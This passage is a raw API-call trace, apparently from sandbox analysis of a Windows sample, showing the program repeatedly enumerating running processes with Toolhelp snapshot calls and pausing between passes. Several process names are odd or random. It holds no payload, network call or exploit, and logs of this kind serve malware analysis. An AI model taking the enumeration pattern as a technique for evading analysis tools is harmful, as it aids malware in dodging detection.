th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.362] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.365] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.368] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.464] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.465] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.466] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.467] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.482] CloseHandle (hObject=0xc4) returned 1 [0107.482] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.487] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.488] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.491] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.494] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.571] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.574] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.577] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.581] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.602] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.654] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.655] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.656] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.657] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.660] CloseHandle (hObject=0xbc) returned 1 [0107.660] Sleep (dwMilliseconds=0x12c) [0107.973] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.979] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.980] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.981] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.985] Process32NextW (in: hSnapshot=0xc4, 